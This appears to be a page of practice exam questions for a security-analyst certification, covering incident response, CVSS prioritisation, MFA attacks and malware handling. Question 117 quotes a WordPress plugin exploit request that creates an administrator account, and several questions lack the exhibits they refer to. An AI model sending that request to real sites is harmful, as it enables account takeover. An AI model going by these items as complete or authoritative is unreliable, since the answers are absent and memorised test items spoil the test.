An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and performs cleanup routines on it infected hosts, including deletion of initial dropper and removal of event log entries and prefetch files from the host. Which of the following data sources would most likely reveal evidence of the root cause?

(Select two).

Options:

A.

Creation time of dropper

B.

Registry artifacts

C.

EDR data

D.

Prefetch files

E.

File system metadata

F.

Sysmon event log

Question 100

A security analyst received an alert regarding multiple successful MFA log-ins for a particular user When reviewing the authentication logs the analyst sees the following:

Which of the following are most likely occurring, based on the MFA logs? (Select two).

Options:

A.

Dictionary attack

B.

Push phishing

C.

impossible geo-velocity

D.

Subscriber identity module swapping

E.

Rogue access point

F.

Password spray

Question 101

Which of the following explains the importance of a timeline when providing an incident response report?

Options:

A.

The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis.

B.

An incident timeline provides the necessary information to understand the actions taken to mitigate the threat or risk.

C.

The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken.

D.

An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timetable.

Question 102

A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that require a connection to the internet. The CPU has an idle process of at least 70%. Which of the following best describes how the security analyst can effectively review the malware without compromising the organization's network?

Options:

A.

Utilize an RDP session on an unused workstation to evaluate the malware.

B.

Disconnect and utilize an existing infected asset off the network.

C.

Create a virtual host for testing on the security analyst workstation.

D.

Subscribe to an online service to create a sandbox environment.

Question 103

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware, based on its telemetry?

Options:

A.

Cross-reference the signature with open-source threat intelligence.

B.

Configure the EDR to perform a full scan.

C.

Transfer the malware to a sandbox environment.

D.

Log in to the affected systems and run necstat.

Question 104

Several incidents have occurred with a legacy web application that has had little development work completed. Which of the following is the most likely cause of the incidents?

Options:

A.

Misconfigured web application firewall

B.

Data integrity failure

C.

Outdated libraries

D.

Insufficient logging

Question 105

A Chief Information Security Officer (CISO) has determined through lessons learned and an associated after-action report that staff members who use legacy applications do not adequately understand how to differentiate between non-malicious emails and phishing emails. Which of the following should the CISO include in an action plan to remediate this issue?

Options:

A.

Awareness training and education

B.

Replacement of legacy applications

C.

Organizational governance

D.

Multifactor authentication on all systems

Question 106

During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

Options:

A.

Conduct regular red team exercises over the application in production

B.

Ensure that all implemented coding libraries are regularly checked

C.

Use application security scanning as part of the pipeline for the CI/CDflow

D.

Implement proper input validation for any data entry form

Question 107

A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings:

Vulnerability 1: CVSS: 3.0/AV:N/AC: L/PR: N/UI : N/S: U/C: H/I : L/A:L

Vulnerability 2: CVSS: 3.0/AV: L/AC: H/PR:N/UI : N/S: U/C: L/I : L/A: H

Vulnerability 3: CVSS: 3.0/AV:A/AC: H/PR: L/UI : R/S: U/C: L/I : H/A:L

Vulnerability 4: CVSS: 3.0/AV: P/AC: L/PR: H/UI : N/S: U/C: H/I:N/A:L

Which of the following vulnerabilities should be patched first?

Options:

A.

Vulnerability 1

B.

Vulnerability 2

C.

Vulnerability 3

D.

Vulnerability 4

Question 108

Which of the following risk management principles is accomplished by purchasing cyber insurance?

Options:

A.

Accept

B.

Avoid

C.

Mitigate

D.

Transfer

Question 109

Which Of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power Plant?

Options:

A.

Containerization

B.

Manual code reviews

C.

Static and dynamic analysis

D.

Formal methods

Question 110

You are a penetration tester who is reviewing the system hardening guidelines for a company. Hardening guidelines indicate the following.

    There must be one primary server or service per device.

    Only default port should be used

    Non- secure protocols should be disabled.

    The corporate internet presence should be placed in a protected subnet

Instructions :

    Using the available tools, discover devices on the corporate network and the services running on these devices.

You must determine

    ip address of each device

    The primary server or service each device

    The protocols that should be disabled based on the hardening guidelines

Options:

Question 111

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

Options:

A.

Set an Http Only flag to force communication by HTTPS.

B.

Block requests without an X-Frame-Options header.

C.

Configure an Access-Control-Allow-Origin header to authorized domains.

D.

Disable the cross-origin resource sharing header.

Question 112

Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target’s information assets?

Options:

A.

Structured Threat Information Expression

B.

OWASP Testing Guide

C.

Open Source Security Testing Methodology Manual

D.

Diamond Model of Intrusion Analysis

Question 113

An analyst is reviewing a vulnerability report for a server environment with the following entries:

Which of the following systems should be prioritized for patching first?

Options:

A.

10.101.27.98

B.

54.73.225.17

C.

54.74.110.26

D.

54.74.110.228

Question 114

A security analyst needs to prioritize vulnerabilities for patching. Given the following vulnerability and system information:

Which of the following systems should the analyst patch first?

Options:

A.

System 1

B.

System 2

C.

System 3

D.

System 4

E.

System 5

F.

System 6

Question 115

A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is

taking place?

Options:

A.

Data exfiltration

B.

Rogue device

C.

Scanning

D.

Beaconing

Question 116

A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?

Options:

A.

Wipe the computer and reinstall software

B.

Shut down the email server and quarantine it from the network.

C.

Acquire a bit-level image of the affected workstation.

D.

Search for other mail users who have received the same file.

Question 117

An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:

/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator

Which of the following controls would work best to mitigate the attack represented by this snippet?

Options:

A.

Limit user creation to administrators only.

B.

Limit layout creation to administrators only.

C.

Set the directory trx_addons to read only for all users.

D.

Set the directory v2 to read only for all users.

Question 118

A security analyst reviews the following results of a Nikto scan:

Which of the following should the security administrator investigate next?

Options:

A.

tiki

B.

phpList

C.

shtml.exe

D.

sshome

Question 119

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

Options:

A.

Log retention

B.

Log rotation

C.

Maximum log size

D.

Threshold value

Question 120

A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection?

Options:

A.

XDR logs

B.

Firewall logs

C.

IDS logs

D.

MFA logs

Question 121

An organization was compromised, and the usernames and passwords of all em-ployees were leaked online. Which of the following best describes the remedia-tion that could reduce the impact of this situation?

Options:

A.

Multifactor authentication

B.

Password changes

C.

System hardening

D.

Password encryption

Question 122

A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following

would best aid in decreasing the workload without increasing staff?

Options:

A.

SIEM

B.

XDR

C.

SOAR

D.

EDR

Question 123

Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?

Options:

A.

Implementing credentialed scanning

B.

Changing from a passive to an active scanning approach

C.

Implementing a central place to manage IT assets

D.

Performing agentless scanning

Question 124

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

Options:

A.

Scope

B.

Weaponization

C.

CVSS

D.

Asset value

Question 125

Which of the following is a circumstance in which a security operations manager would most likely consider using automation?

Options:

A.

The generation of NIDS rules based on received STIX messages

B.

The fulfillment of privileged access requests to enterprise domain controllers

C.

The verification of employee identities prior to initial PKI enrollment

D.

The analysis of suspected malware binaries captured by an email gateway

Question 126

A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script:

Which of the following scripting languages was used in the script?

Options:

A.

PowerShel

B.

Ruby

C.

Python

D.

Shell script

Demo: 126 questions
Total 422 questions